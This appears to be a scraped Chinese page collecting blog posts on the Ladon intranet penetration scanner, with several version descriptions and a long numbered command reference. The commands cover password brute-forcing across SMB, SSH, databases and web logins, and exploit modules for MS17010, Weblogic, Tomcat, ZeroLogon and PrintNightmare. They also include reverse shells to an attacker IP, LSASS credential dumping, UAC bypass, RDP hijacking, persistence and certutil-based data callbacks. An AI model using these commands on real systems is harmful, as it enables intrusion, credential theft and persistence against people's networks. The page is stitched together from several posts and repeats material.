精华内容
下载资源
问答
  • Ladon7.0.rar

    2020-07-19 21:30:49
    Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.0版本内置...
  • 介绍:Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。...
  • django-ladon 一个相当简单的包装器,用于在 django 项目中包含 ladon。 只需将 django_ladon 添加到您的 INSTALLED_APPS,以通常的 ladon 方式在您的应用程序中的 ladon.py 中编写您的网络服务类,然后将 url...
  • Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置...
  • Ladon-开源

    2021-07-01 17:17:32
    Ladon 是一个分布式计算系统,用于替代分布式网络和各种@home 项目的专有软件。 目标是允许任何人在那里创建自己的分布式计算项目。 并简化提高认识的过程
  • Ladon是用编写的用于访问控制策略的库,类似于或。 与和相比,您可以获得细粒度的访问控制,并且能够在复杂的环境(例如多租户或分布式应用程序和大型组织)中回答问题。 Ladon受启发。 Ladon正式随附了示例性的...
  • Ladon 7.2 20200815 程序简介 Ladon一种用于大型网络渗透性的多线程插件化综合扫描神器,包括端口扫描,服务识别,网络资产,密码爆破,高危漏洞检测以及一键GetShell,支持批量A段/ B段/ C段以及跨7.2版本内置94个...
  • 综合扫描 -- Ladon

    2021-01-27 09:29:09
    Cobalt Strike,Ladon7.2内置94个模块,包含信息收集/存活主机/端口扫描/服务识别/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2,密码口令爆破(Mysql/Oracle/MSSQL)/...

    将喜欢的东西留在身边,这就是努力的意义。。。

    ----  网易云热评

     

    一、软件介绍

    大型内网渗透扫描器&Cobalt Strike,Ladon7.2内置94个模块,包含信息收集/存活主机/端口扫描/服务识别/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2,密码口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbios/LDAP/SmbHash/WmiHash/Winrm),远程执行命令(wmiexe/psexec/atexec/sshexec/webshell),降权提权Runas、GetSystem,Poc/Exploit,支持Cobalt Strike 3.X-4.0

     

    二、下载地址

    https://github.com/k8gege/Ladon

     

    三、使用方法

    001、多协议探测存活主机 (IP、机器名、MAC地址、制造商),直接输入要扫描的ip段,选择OnlinePC

    002、多协议识别操作系统 (IP、机器名、操作系统版本、开放服务),输入ip地址,选择OsScan

    003、扫描存活主机

    004、扫描SMB漏洞MS17010

    005 ICMP扫描存活主机

    Ladon 192.168.1.8/24 Ping

    006 SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)

    Ladon 192.168.1.8/24 SMBGhost

    007 扫描Web信息/Http服务

    Ladon 192.168.1.8/24 WebScan

    008 扫描C段站点URL域名

    Ladon 192.168.1.8/24 UrlScan

    009 扫描C段站点URL域名

    Ladon 192.168.1.8/24 SameWeb

    010 扫描子域名、二级域名

    Ladon baidu.com SubDomain

    011 域名解析IP、主机名解析IP

    Ladon baidu.com DomainIP Ladon baidu.com HostIP

    012 域内机器信息获取

    Ladon AdiDnsDump 192.168.1.8 (Domain IP)

    013 扫描C段端口、指定端口扫描

    Ladon 192.168.1.8/24 PortScan Ladon 192.168.1.8 PortScan 80,445,3389

    014 扫描C段WEB以及CMS(75种Web指纹识别)

    Ladon 192.168.1.8/24 WhatCMS

    015 扫描思科设备

    Ladon 192.168.1.8/24 CiscoScan Ladon http://192.168.1.8 CiscoScan

    016 枚举Mssql数据库主机 (数据库IP、机器名、SQL版本)

    Ladon EnumMssql

    017 枚举网络共享资源 (域、存活IP、共享路径)

    Ladon EnumShare

    018 扫描LDAP服务器

    Ladon 192.168.1.8/24 LdapScan

    019 扫描FTP服务器

    Ladon 192.168.1.8/24 FtpScan

    暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆

    密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html

    020 445端口 SMB密码爆破(Windows)

    Ladon 192.168.1.8/24 SmbScan

    021 135端口 Wmi密码爆破(Windowns)

    Ladon 192.168.1.8/24 WmiScan

    022 389端口 LDAP服务器、AD域密码爆破(Windows)

    Ladon 192.168.1.8/24 LdapScan

    023 5985端口 Winrm密码爆破(Windowns)

    Ladon 192.168.1.8/24 WinrmScan.ini

    024 445端口 SMB NTLM HASH爆破(Windows)

    Ladon 192.168.1.8/24 SmbHashScan

    025 135端口 Wmi NTLM HASH爆破(Windows)

    Ladon 192.168.1.8/24 WmiHashScan

    026 22端口 SSH密码爆破(Linux)

    Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

    027 1433端口 Mssql数据库密码爆破

    Ladon 192.168.1.8/24 MssqlScan

    028 1521端口 Oracle数据库密码爆破

    Ladon 192.168.1.8/24 OracleScan

    029 3306端口 Mysql数据库密码爆破

    Ladon 192.168.1.8/24 MysqlScan

    030 7001端口 Weblogic后台密码爆破

    Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

    031 5900端口 VNC远程桌面密码爆破

    Ladon 192.168.1.8/24 VncScan

    032 21端口 Ftp服务器密码爆破

    Ladon 192.168.1.8/24 FtpScan

    033 8080端口 Tomcat后台登陆密码爆破

    Ladon 192.168.1.8/24 TomcatScan Ladon http://192.168.1.8:8080/manage TomcatScan

    034 Web端口 401基础认证密码爆破

    Ladon http://192.168.1.8/login HttpBasicScan

    035 445端口 Impacket SMB密码爆破(Windowns)

    Ladon 192.168.1.8/24 SmbScan.ini

    036 445端口 IPC密码爆破(Windowns)

    Ladon 192.168.1.8/24 IpcScan.ini

    漏洞检测/漏洞利用/Poc/Exp

    037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)

    Ladon 192.168.1.8/24 MS17010

    038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)

    Ladon 192.168.1.8/24 WeblogicPoc

    039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)

    Ladon 192.168.1.8/24 PhpStudyPoc

    040 ActiveMQ漏洞检测(CVE-2016-3088)

    Ladon 192.168.1.8/24 ActivemqPoc

    041 Tomcat漏洞检测(CVE-2017-12615)

    Ladon 192.168.1.8/24 TomcatPoc

    042 Weblogic漏洞利用(CVE-2019-2725)

    Ladon 192.168.1.8/24 WeblogicExp

    043 Tomcat漏洞利用(CVE-2017-12615)

    Ladon 192.168.1.8/24 TomcatExp

    044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

    Ladon 192.168.1.8/24 Struts2Poc

    FTP下载、HTTP下载

    045 HTTP下载

    Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar

    046 Ftp下载

    Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

    加密解密(HEX/Base64)

    047 Hex加密解密

    Ladon 123456 EnHex Ladon 313233343536 DeHex

    048 Base64加密解密

    Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64

    网络嗅探

    049 Ftp密码嗅探

    Ladon FtpSniffer 192.168.1.5

    050 HTTP密码嗅探

    Ladon HTTPSniffer 192.168.1.5

    051 网络嗅探

    Ladon Sniffer

    密码读取

    052 读取IIS站点密码、网站路径

    Ladon IISpwd

    DumpLsass内存密码

    Ladon DumpLsass

    信息收集

    053 进程详细信息

    Ladon EnumProcess Ladon Tasklist

    054 获取命令行参数

    Ladon cmdline Ladon cmdline cmd.exe

    055 获取渗透基础信息

    Ladon GetInfo Ladon GetInfo2

    056 .NET & PowerShell版本

    Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

    057 运行时版本&编译环境

    Ladon Ver Ladon Version

    远程执行(psexec/wmiexec/atexec/sshexec)

    445端口 PSEXEC远程执行命令(交互式)

    net user \192.168.1.8 k8gege520 /user:k8gege Ladon psexec 192.168.1.8 psexec> whoami nt authority\system

    058 135端口 WmiExec远程执行命令 (非交互式)

    Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

    059 445端口 AtExec远程执行命令(非交互式)

    Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

    060 22端口 SshExec远程执行命令(非交互式)

    Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

    061 JspShell远程执行命令(非交互式)

    Usage:Ladon JspShell type url pwd cmd Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

    062 WebShell远程执行命令(非交互式)

    Usage:Ladon WebShell ScriptType ShellType url pwd cmd

    Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami

    Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami

    Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

    提权降权

    063 BypassUac 绕过UAC执行,支持Win7-Win10

    Ladon BypassUac c:\1.exe Ladon BypassUac c:\1.bat

    064 GetSystem 提权或降权运行程序

    Ladon GetSystem cmd.exe Ladon GetSystem cmd.exe explorer

    065 Runas 模拟用户执行命令

    Ladon Runas user pass cmd

    其它功能

    066 Win2008一键启用.net 3.5

    Ladon EnableDotNet

    067 获取内网站点HTML源码

    Ladon gethtml http://192.168.1.1

    068 检测后门

    Ladon CheckDoor Ladon AutoRun

    069 获取本机内网IP与外网IP

    Ladon GetIP

    070 一键迷你WEB服务器

    Ladon WebSer 80 Ladon web 80

    反弹Shell

    071 反弹TCP NC Shell

    Ladon ReverseTcp 192.168.1.8 4444 nc

    072 反弹TCP MSF Shell

    Ladon ReverseTcp 192.168.1.8 4444 shell

    073 反弹TCP MSF MET Shell

    Ladon ReverseTcp 192.168.1.8 4444 meter

    074 反弹HTTP MSF MET Shell

    Ladon ReverseHttp 192.168.1.8 4444

    075 反弹HTTPS MSF MET Shell

    Ladon ReverseHttps 192.168.1.8 4444

    076 反弹TCP CMD & PowerShell Shell

    Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

    077 反弹UDP Cmd & PowerShell Shell

    Ladon PowerCat 192.168.1.8 4444 cmd udp Ladon PowerCat 192.168.1.8 4444 psh udp

    078 RDP桌面会话劫持(无需密码)

    Ladon RDPHijack 3 Ladon RDPHijack 3 console

    079 OXID定位多网卡主机

    Ladon 192.168.1.8/24 EthScan Ladon 192.168.1.8/24 OxidScan

    080 查看用户最近访问文件

    Ladon Recent

    081 添加注册表Run启动项

    Ladon RegAuto Test c:\123.exe

    082 AT计划执行程序(无需时间)(system权限)

    Ladon at c:\123.exe Ladon at c:\123.exe gui

    083 SC服务加启动项&执行程序(system权限)

    Ladon sc c:\123.exe Ladon sc c:\123.exe gui Ladon sc c:\123.exe auto ServerName

    084 MS16135提权至SYSTEM

    Ladon ms16135 whoami

    085 BadPotato服务用户提权至SYSTEM

    Ladon BadPotato cmdline

    086 SweetPotato服务用户提权至SYSTEM

    Ladon SweetPotato cmdline

    087 whoami查看当前用户权限以及特权

    Ladon whoami

    088 Open3389一键开启3389

    Ladon Open3389

    089 RdpLog查看3389连接记录

    Ladon RdpLog

    090 QueryAdmin查看管理员用户

    Ladon QueryAdmin

    091 激活内置管理员Administrator

    Ladon ActiveAdmin

    092 激活内置用户Guest

    Ladon ActiveGuest

    093 查看本机命名管道

    Ladon GetPipe

    094 139端口Netbios协议Windows密码爆破

    Ladon 192.168.1.8/24 NbtScan

     

     

    禁止非法,后果自负

    欢迎关注公众号:web安全工具库

     

    展开全文
  • Ladon6.0 PowerShell版,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。6.5版本内置70个功能模块
  • Ladon8.9扫描器简明教程/用法例子

    千次阅读 2020-05-31 22:47:39
    本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。 完整文档:http://k8gege.org/Ladon 资产扫描、指纹识别、服务识别、存活主机、端口扫描 001 多协议扫描存活主机(IP、机器名、MAC地址、制造商...

    前言

    Ladon 简明使用教程 完整文档: http://k8gege.org/Ladon
    支持Cmd、Shell、Cobalt Strike、PowerShell下使用
    Windows版本: .Net、Cobalt Strike、PowerShell
    全系统版本:GO(全平台)、Python(理论上全平台)
    PS: GUI版主要方便本地测试使用,完整功能使用CMD

    版本

    Ladon8.9 20210920
    简明用法例子 120模块

    自定义线程扫描

    例子:扫描目标10.1.2段是否存在MS17010漏洞
    单线程:Ladon 10.1.2.8/24 MS17010 t=1
    80线程:Ladon noping 10.1.2.8/24 MS17010 t=80
    在高强度防护下的网络默认线程无法扫描,必须单线程

    Socks5代理扫描

    例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping)
    Ladon noping 10.1.2.8/24 MS17010
    详见:http://k8gege.org/Ladon/proxy.html

    网段扫描

    CIDR格式:不只是/24/16/8(所有)
    Ladon 192.168.1.8/24 扫描模块
    Ladon 192.168.1.8/16 扫描模块
    Ladon 192.168.1.8/8 扫描模块

    字母格式:仅C段B段A段 顺序排序
    Ladon 192.168.1.8/c 扫描模块
    Ladon 192.168.1.8/b 扫描模块
    Ladon 192.168.1.8/a 扫描模块

    资产扫描、指纹识别、服务识别、存活主机、端口扫描

    001 多协议探测存活主机 (IP、机器名、MAC地址、制造商)

    Ladon 192.168.1.8/24 OnlinePC

    002 多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)

    Ladon 192.168.1.8/24 OsScan

    003 扫描存活主机

    Ladon 192.168.1.8/24 OnlineIP

    004 ICMP扫描存活主机

    Ladon 192.168.1.8/24 Ping

    005 扫描SMB漏洞MS17010 (IP、机器名、漏洞编号、操作系统版本)

    Ladon 192.168.1.8/24 MS17010

    006 SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)

    Ladon 192.168.1.8/24 SMBGhost

    007 扫描Web信息/Http服务

    Ladon 192.168.1.8/24 WebScan

    008 扫描C段站点URL域名

    Ladon 192.168.1.8/24 UrlScan

    009 扫描C段站点URL域名

    Ladon 192.168.1.8/24 SameWeb

    010 扫描子域名、二级域名

    Ladon baidu.com SubDomain

    011 域名解析IP、主机名解析IP

    Ladon baidu.com DomainIP
    Ladon baidu.com HostIP

    012 域内机器信息获取

    Ladon AdiDnsDump 192.168.1.8 (Domain IP)

    013 扫描C段端口、指定端口扫描

    Ladon 192.168.1.8/24 PortScan
    Ladon 192.168.1.8 PortScan 80,445,3389

    014 扫描C段WEB以及CMS(75种Web指纹识别)

    Ladon 192.168.1.8/24 WhatCMS

    015 扫描思科设备

    Ladon 192.168.1.8/24 CiscoScan
    Ladon http://192.168.1.8 CiscoScan

    016 枚举Mssql数据库主机 (数据库IP、机器名、SQL版本)

    Ladon EnumMssql

    017 枚举网络共享资源 (域、存活IP、共享路径)

    Ladon EnumShare

    018 扫描LDAP服务器

    Ladon 192.168.1.8/24 LdapScan

    019 扫描FTP服务器

    Ladon 192.168.1.8/24 FtpScan

    暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆

    密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html

    020 445端口 SMB密码爆破(Windows)

    Ladon 192.168.1.8/24 SmbScan

    021 135端口 Wmi密码爆破(Windowns)

    Ladon 192.168.1.8/24 WmiScan

    022 389端口 LDAP服务器、AD域密码爆破(Windows)

    Ladon 192.168.1.8/24 LdapScan

    023 5985端口 Winrm密码爆破(Windowns)

    Ladon 192.168.1.8/24 WinrmScan.ini

    024 445端口 SMB NTLM HASH爆破(Windows)

    Ladon 192.168.1.8/24 SmbHashScan

    025 135端口 Wmi NTLM HASH爆破(Windows)

    Ladon 192.168.1.8/24 WmiHashScan

    026 22端口 SSH密码爆破(Linux)

    Ladon 192.168.1.8/24 SshScan
    Ladon 192.168.1.8:22 SshScan

    027 1433端口 Mssql数据库密码爆破

    Ladon 192.168.1.8/24 MssqlScan

    028 1521端口 Oracle数据库密码爆破

    Ladon 192.168.1.8/24 OracleScan

    029 3306端口 Mysql数据库密码爆破

    Ladon 192.168.1.8/24 MysqlScan

    030 7001端口 Weblogic后台密码爆破

    Ladon http://192.168.1.8:7001/console WeblogicScan
    Ladon 192.168.1.8/24 WeblogicScan

    031 5900端口 VNC远程桌面密码爆破

    Ladon 192.168.1.8/24 VncScan

    032 21端口 Ftp服务器密码爆破

    Ladon 192.168.1.8/24 FtpScan

    033 8080端口 Tomcat后台登陆密码爆破

    Ladon 192.168.1.8/24 TomcatScan
    Ladon http://192.168.1.8:8080/manage TomcatScan

    034 Web端口 401基础认证密码爆破

    Ladon http://192.168.1.8/login HttpBasicScan

    035 445端口 Impacket SMB密码爆破(Windowns)

    Ladon 192.168.1.8/24 SmbScan.ini

    036 445端口 IPC密码爆破(Windowns)

    Ladon 192.168.1.8/24 IpcScan.ini

    漏洞检测/漏洞利用/Poc/Exp

    037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)

    Ladon 192.168.1.8/24 MS17010

    038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)

    Ladon 192.168.1.8/24 WeblogicPoc

    039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)

    Ladon 192.168.1.8/24 PhpStudyPoc

    040 ActiveMQ漏洞检测(CVE-2016-3088)

    Ladon 192.168.1.8/24 ActivemqPoc

    041 Tomcat漏洞检测(CVE-2017-12615)

    Ladon 192.168.1.8/24 TomcatPoc

    042 Weblogic漏洞利用(CVE-2019-2725)

    Ladon 192.168.1.8/24 WeblogicExp

    043 Tomcat漏洞利用(CVE-2017-12615)

    Ladon 192.168.1.8/24 TomcatExp

    044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

    Ladon 192.168.1.8/24 Struts2Poc

    FTP下载、HTTP下载

    045 HTTP下载

    Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar

    046 Ftp下载

    Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

    加密解密(HEX/Base64)

    047 Hex加密解密

    Ladon 123456 EnHex
    Ladon 313233343536 DeHex

    048 Base64加密解密

    Ladon 123456 EnBase64
    Ladon MTIzNDU2 DeBase64

    网络嗅探

    049 Ftp密码嗅探

    Ladon FtpSniffer 192.168.1.5

    050 HTTP密码嗅探

    Ladon HTTPSniffer 192.168.1.5

    051 网络嗅探

    Ladon Sniffer

    密码读取

    052 读取IIS站点密码、网站路径

    Ladon IISpwd

    DumpLsass内存密码

    Ladon DumpLsass

    信息收集

    053 进程详细信息

    Ladon EnumProcess
    Ladon Tasklist

    054 获取命令行参数

    Ladon cmdline
    Ladon cmdline cmd.exe

    055 获取渗透基础信息

    Ladon GetInfo
    Ladon GetInfo2

    056 .NET & PowerShell版本

    Ladon NetVer
    Ladon PSver
    Ladon NetVersion
    Ladon PSversion

    057 运行时版本&编译环境

    Ladon Ver
    Ladon Version

    远程执行(psexec/wmiexec/atexec/sshexec)

    445端口 加密PSEXEC远程执行命令(交互式)

    net user \192.168.1.8 k8gege520 /user:k8gege
    Ladon psexec 192.168.1.8
    psexec> whoami
    nt authority\system

    058 135端口 WmiExec远程执行命令 (非交互式)

    Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami (8.2前用法)
    Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami (8.2后用法)
    Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p (8.2后用法)

    059 445端口 AtExec远程执行命令(非交互式)

    Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

    060 22端口 SshExec远程执行命令(非交互式)

    Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
    Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

    061 JspShell远程执行命令(非交互式)

    Usage:Ladon JspShell type url pwd cmd
    Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

    062 WebShell远程执行命令(非交互式)

    Usage:Ladon WebShell ScriptType ShellType url pwd cmd
    Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
    Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
    Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
    

    提权降权

    063 BypassUac2 绕过UAC执行,支持Win7-Win10

    Ladon BypassUac2 c:\1.exe
    Ladon BypassUac2 c:\1.bat

    064 GetSystem 提权或降权运行程序

    Ladon GetSystem cmd.exe
    Ladon GetSystem cmd.exe explorer

    065 Runas 模拟用户执行命令

    Ladon Runas user pass cmd

    其它功能

    066 Win2008一键启用.net 3.5

    Ladon EnableDotNet

    067 获取内网站点HTML源码

    Ladon gethtml http://192.168.1.1

    068 检测后门

    Ladon CheckDoor
    Ladon AutoRun

    069 获取本机内网IP与外网IP

    Ladon GetIP

    070 一键迷你WEB服务器

    Ladon WebSer 80
    Ladon web 80
    列目录
    Ladon web 80 dir

    获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg)
    http://192.168.1.8/ip.txt

    反弹Shell

    071 反弹TCP NC Shell

    Ladon ReverseTcp 192.168.1.8 4444 nc

    072 反弹TCP MSF Shell

    Ladon ReverseTcp 192.168.1.8 4444 shell

    073 反弹TCP MSF MET Shell

    Ladon ReverseTcp 192.168.1.8 4444 meter

    074 反弹HTTP MSF MET Shell

    Ladon ReverseHttp 192.168.1.8 4444

    075 反弹HTTPS MSF MET Shell

    Ladon ReverseHttps 192.168.1.8 4444

    076 反弹TCP CMD & PowerShell Shell

    Ladon PowerCat 192.168.1.8 4444 cmd
    Ladon PowerCat 192.168.1.8 4444 psh

    077 反弹UDP Cmd & PowerShell Shell

    Ladon PowerCat 192.168.1.8 4444 cmd udp
    Ladon PowerCat 192.168.1.8 4444 psh udp

    078 RDP桌面会话劫持(无需密码)

    Ladon RDPHijack 3
    Ladon RDPHijack 3 console

    079 OXID定位多网卡主机

    Ladon 192.168.1.8/24 EthScan
    Ladon 192.168.1.8/24 OxidScan

    080 查看用户最近访问文件

    Ladon Recent

    081 添加注册表Run启动项

    Ladon RegAuto Test c:\123.exe

    082 AT计划执行程序(无需时间)(system权限)

    Ladon at c:\123.exe
    Ladon at c:\123.exe gui

    083 SC服务加启动项&执行程序(system权限)

    Ladon sc c:\123.exe
    Ladon sc c:\123.exe gui
    Ladon sc c:\123.exe auto ServerName

    084 MS16135提权至SYSTEM

    Ladon ms16135 whoami

    085 BadPotato服务用户提权至SYSTEM

    Ladon BadPotato cmdline

    086 SweetPotato服务用户提权至SYSTEM

    Ladon SweetPotato cmdline

    087 whoami查看当前用户权限以及特权

    Ladon whoami

    088 Open3389一键开启3389

    Ladon Open3389

    089 RdpLog查看3389连接记录

    Ladon RdpLog

    090 QueryAdmin查看管理员用户

    Ladon QueryAdmin

    091 激活内置管理员Administrator

    Ladon ActiveAdmin

    092 激活内置用户Guest

    Ladon ActiveGuest

    093 查看本机命名管道

    Ladon GetPipe

    094 139端口Netbios协议Windows密码爆破

    Ladon 192.168.1.8/24 NbtScan

    095 5985端口Winrm协议Windows密码爆破

    Ladon 192.168.1.8/24 WinrmScan

    096 WinrmExec远程执行命令无回显(支持System权限)

    Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

    097 getstr/getb64/debase64(无回显漏洞回显结果)

    监听 Ladon web 800

    提交 返回明文
    certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
    Base64加密结果
    certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
    Base64结果解密
    certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

    098 ZeroLogon CVE-2020-1472域控提权(密码置空)

    Ladon ZeroLogon dc.k8gege.org

    099 CVE-2020-0688 Exchange序列化漏洞(.net 4.0)

    Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520

    100 Shiro插件探测

    Ladon 192.168.1.8/24 IsShiro

    101 网络摄像头密码爆破(内置默认密码)

    Ladon 192.168.1.8/24 DvrScan

    102 Snmp协议探测操作系统、设备等信息

    Ladon 192.168.1.8/24 SnmpScan

    103 Nbt协议探测Windows主机名、域、用户

    Ladon 192.168.1.8/24 NbtInfo

    104 Smb协议探测Windows版本、主机名、域

    Ladon 192.168.1.8/24 SmbInfo

    105 Wmi协议探测Windows版本、主机名、域

    Ladon 192.168.1.8/24 WmiInfo

    106 Mssql协议探测Windows版本、主机名、域

    Ladon 192.168.1.8/24 MssqlInfo

    107 Winrm协议探测Windows版本、主机名、域

    Ladon 192.168.1.8/24 WinrmInfo

    108 Exchange探测Windows版本、主机名、域

    Ladon 192.168.1.8/24 ExchangeInfo

    109 Rdp协议探测Windows版本、主机名、域

    For单线程: Ladon 192.168.1.8/24 RdpInfo f=1

    110 netsh本机888端口转发至112的22端口

    Ladon netsh add 888 192.168.1.112 22

    111 列目录

    Ladon DirList 默认列全盘
    Ladon DirList c:\ 指定盘符或目录

    112 6种白名单BypassUAC(8.0后)Win7-Win10

    用法Ladon BypassUAC Method Base64Cmd

    Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
    Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
    Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
    Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
    Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
    Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==

    113 135端口 WmiExec2远程执行命令 (非交互式)支持文件上传

    Usage:
    Ladon WmiExec2 host user pass cmd whoami
    Ladon WmiExec2 pth host cmd whoami
    Base64Cmd for Cobalt Strike
    Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
    Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
    Upload:
    Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
    Ladon WmiExec2 pth host upload beacon.exe ceacon.exe

    114 ForExec循环漏洞利用(Win10永恒之黑CVE-2020-0796,成功退出以免目标蓝屏)

    Ladon ForExec “CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt” 80 “Exploit finnished”

    115 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)打印机漏洞提权EXP

    Ladon PrintNightmare c:\evil.dll
    Ladon CVE-2021-1675 c:\evil.dll

    116 445端口 SmbExec Ntlm-Hash非交互式远程执行命令(无回显)

    Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
    Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

    117 USB使用记录查看(USB名称、USB标记、路径信息)

    Ladon UsbLog

    118 Windows 0day漏洞通用DLL注入执行CMD生成器(DLL仅5KB)

    Ladon CmdDll x86 calc
    Ladon CmdDll x64 calc
    Ladon CmdDll b64x86 YwBhAGwAYwA=
    Ladon CmdDll b64x64 YwBhAGwAYwA=

    119 CVE-2021-40444 微软IE/Office 0day漏洞

    Ladon CVE-2021-40444 MakeCab poc.dll
    Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

    自定义程序集插件扫描

    Ladon 192.168.1.8/24 IsShiro.exe

    工具下载

    历史版本: https://github.com/k8gege/Ladon/releases
    7.0版本:https://k8gege.org/Download
    8.9版本:K8小密圈

    展开全文
  • Ladon6.6大型内网渗透扫描器含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。6.5版本内置70个功能模块
  • Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。6.5版本内置...
  • Ladon9.1.1插件右键功能已更新174个,相比9.1.0的131个新增了43个功能,本机密码新增4个主流浏览器Chrome、Firefox、Edge、Coccoc帐密、历史记录、Cookie等,新增CMD常用渗透命令30+,Ladon9.1.1插件采用分离式加载...

    简介

    Ladon9.1.1插件右键功能已更新174个,相比9.1.0的131个新增了43个功能,本机密码新增4个主流浏览器Chrome、Firefox、Edge、Coccoc帐密、历史记录、Cookie等,新增CMD常用渗透命令30+,Ladon9.1.1插件采用分离式加载,减少网络卡时加载Ladon导致CS假死情况。其它功能,新增.net测试&powershell测试,用于测试目标杀软是否拦截CS加载.NET程序或Powershell等,具体功能大家实战测试吧,实战为王,多说无益。

    Ladon主程序

    Ladon 9.1.1 20211211更新功能

    =======================
    [u]OnlinePC 新增Exchange探测主机
    [u]OnlinePC 新增MSSQL探测存活主机
    [u]OnlinePC 新增SMB探测存活主机
    [u]OnlinePC 新增WMI探测存活主机
    [u]OnlinePC 新增WinRM探测存活主机
    [u]MS17010 解决部分OS版本乱码问题
    [-]Dumplsass模块移除转PowerShell免杀
    [u]WifiPwd 读wifi密码含当前连接WIFI
    [u]GetInfo 含当前连接WIFI信息

    GUI 9.1.1 20211211更新功能

    [u]OnlinePC 表格调整
    [u]cmddll AddUser系统登陆界面隐藏添加用户
    修复重复显示的BUG 却除DNS只保留域名
    MS17010 解决OS版本乱码(SMBINFO)

    无图无真相(CS插件部分截图)

    1.网络资产收集功能

    2.操作系统信息探测

